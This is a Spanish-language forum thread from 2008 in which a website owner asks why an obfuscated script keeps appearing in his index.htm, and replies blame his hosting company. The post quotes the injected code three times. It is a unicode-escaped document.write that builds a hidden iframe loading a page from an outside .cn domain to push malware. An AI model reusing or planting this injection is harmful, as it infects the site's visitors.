Foros del Web » Programando para Internet » Javascript »

Alguien conoce este script ?

Estas en el tema de Alguien conoce este script ? en el foro de Javascript en Foros del Web. Saludos, me viene ocurriendo desde hace tiempo que en el index.htm de una web alojada en un servidor de windows y a medida que pasan ...
  #1 (permalink)  
Antiguo 28/02/2008, 14:09
Avatar de salvaiber  
Fecha de Ingreso: octubre-2007
Mensajes: 3
Antigüedad: 16 años, 6 meses
Puntos: 0
Exclamación Alguien conoce este script ?

Saludos, me viene ocurriendo desde hace tiempo que en el index.htm de una web alojada en un servidor de windows y a medida que pasan los días se "auto escribe" un script que varios antivirus detectan como troyanos, redirigiendo la pagina para descargarlos. La empresa de hosting...no sabe nada del asunto y la única solución que me queda es renovar el index.htm subiendo el archivo "limpio".
Quisiera saber por qué ocurre y como evitarlo ?

El script en concreto es este,....
<script type="text/javascript">document.write('\u003c\u0069\u0046\u00 72\u0041\u006d\u0045\u0020\u0073\u0052\u0063\u003d \u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u 0077\u0077\u0077\u002e\u0061\u0039\u0072\u0068\u00 69\u0077\u0061\u002e\u0063\u006e\u002f\u0075\u0070 \u0064\u0061\u0074\u0065\u005f\u0066\u0069\u006c\u 0065\u0073\u002f\u0075\u0070\u0064\u0061\u0074\u00 65\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0043 \u0052\u004f\u006c\u006c\u0049\u004e\u0067\u003d\u 0027\u006e\u006f\u0027\u0020\u0077\u0049\u0064\u00 54\u0068\u003d\u0022\u0030\u0030\u0030\u0031\u0022 \u0020\u0068\u0045\u0069\u0067\u0048\u0074\u003d\u 0027\u0030\u0030\u0030\u0031\u0027\u0020\u0073\u00 54\u0059\u006c\u0065\u003d\u0022\u0064\u0069\u0073 \u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u 0065\u0022\u0020\u006e\u0061\u006d\u0065\u003d\u00 22\u0061\u006e\u0034\u0073\u0073\u006f\u006c\u006c \u0022\u003e\u0062\u0075\u0064\u006f\u0070\u0065\u 0073\u0068\u0074\u002e\u002e\u002e\u002f\u002f\u00 2f\u003c\u002f\u0069\u0046\u0072\u0041\u006d\u0045 \u003e')</script>
<script type="text/javascript">document.write('\u003c\u0069\u0046\u00 72\u0041\u006d\u0045\u0020\u0073\u0052\u0063\u003d \u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u 0077\u0077\u0077\u002e\u0061\u0039\u0072\u0068\u00 69\u0077\u0061\u002e\u0063\u006e\u002f\u0075\u0070 \u0064\u0061\u0074\u0065\u005f\u0066\u0069\u006c\u 0065\u0073\u002f\u0075\u0070\u0064\u0061\u0074\u00 65\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0043 \u0052\u004f\u006c\u006c\u0049\u004e\u0067\u003d\u 0027\u006e\u006f\u0027\u0020\u0077\u0049\u0064\u00 54\u0068\u003d\u0022\u0030\u0030\u0030\u0031\u0022 \u0020\u0068\u0045\u0069\u0067\u0048\u0074\u003d\u 0027\u0030\u0030\u0030\u0031\u0027\u0020\u0073\u00 54\u0059\u006c\u0065\u003d\u0022\u0064\u0069\u0073 \u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u 0065\u0022\u0020\u006e\u0061\u006d\u0065\u003d\u00 22\u0061\u006e\u0034\u0073\u0073\u006f\u006c\u006c \u0022\u003e\u0062\u0075\u0064\u006f\u0070\u0065\u 0073\u0068\u0074\u002e\u002e\u002e\u002f\u002f\u00 2f\u003c\u002f\u0069\u0046\u0072\u0041\u006d\u0045 \u003e')</script>
<script type="text/javascript">document.write('\u003c\u0069\u0046\u00 72\u0041\u006d\u0045\u0020\u0073\u0052\u0063\u003d \u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u 0077\u0077\u0077\u002e\u0061\u0039\u0072\u0068\u00 69\u0077\u0061\u002e\u0063\u006e\u002f\u0075\u0070 \u0064\u0061\u0074\u0065\u005f\u0066\u0069\u006c\u 0065\u0073\u002f\u0075\u0070\u0064\u0061\u0074\u00 65\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0043 \u0052\u004f\u006c\u006c\u0049\u004e\u0067\u003d\u 0027\u006e\u006f\u0027\u0020\u0077\u0049\u0064\u00 54\u0068\u003d\u0022\u0030\u0030\u0030\u0031\u0022 \u0020\u0068\u0045\u0069\u0067\u0048\u0074\u003d\u 0027\u0030\u0030\u0030\u0031\u0027\u0020\u0073\u00 54\u0059\u006c\u0065\u003d\u0022\u0064\u0069\u0073 \u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u 0065\u0022\u0020\u006e\u0061\u006d\u0065\u003d\u00 22\u0061\u006e\u0034\u0073\u0073\u006f\u006c\u006c \u0022\u003e\u0062\u0075\u0064\u006f\u0070\u0065\u 0073\u0068\u0074\u002e\u002e\u002e\u002f\u002f\u00 2f\u003c\u002f\u0069\u0046\u0072\u0041\u006d\u0045 \u003e')</script>

Muchas garcias, saludos.
  #2 (permalink)  
Antiguo 28/02/2008, 14:51
 
Fecha de Ingreso: diciembre-2007
Ubicación: Argentina
Mensajes: 151
Antigüedad: 16 años, 4 meses
Puntos: 2
Re: Alguien conoce este script ?

Creo que no vas a encontrar solucion alguna en este post. Si el archivo index.htm se está sobreescribiendo deberías molestar a los que te venden el servicio de alojamiento web ya que ellos son los unicos responzables. Si no te dan solucion te aconsejo que te cambies de servidor cuanto antes.

Saludos
  #3 (permalink)  
Antiguo 28/02/2008, 15:55
 
Fecha de Ingreso: enero-2008
Ubicación: Argentina
Mensajes: 215
Antigüedad: 16 años, 3 meses
Puntos: 23
Re: Alguien conoce este script ?

Tal como dice el usuario codigojavascript, la responsabilidad en este caso es de la empresa de hosting ,que debe tener un serio problema de seguridad. Mi consejo es que cambies de host, pues aunque te pidan disculpas o te solucionen el tema, no es confiable que alojes tu sitio alli.

Un abrazo.
  #4 (permalink)  
Antiguo 29/02/2008, 03:31
Avatar de salvaiber  
Fecha de Ingreso: octubre-2007
Mensajes: 3
Antigüedad: 16 años, 6 meses
Puntos: 0
De acuerdo Re: Alguien conoce este script ?

Saludos a los dos, muchas gracias por vuestras respuestas, pues llevo tiempo pensando que el problema es de la empresa de hosting. Vuestras valoraciones reafirman mis sospechas al respecto.
Gracias.
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 08:40.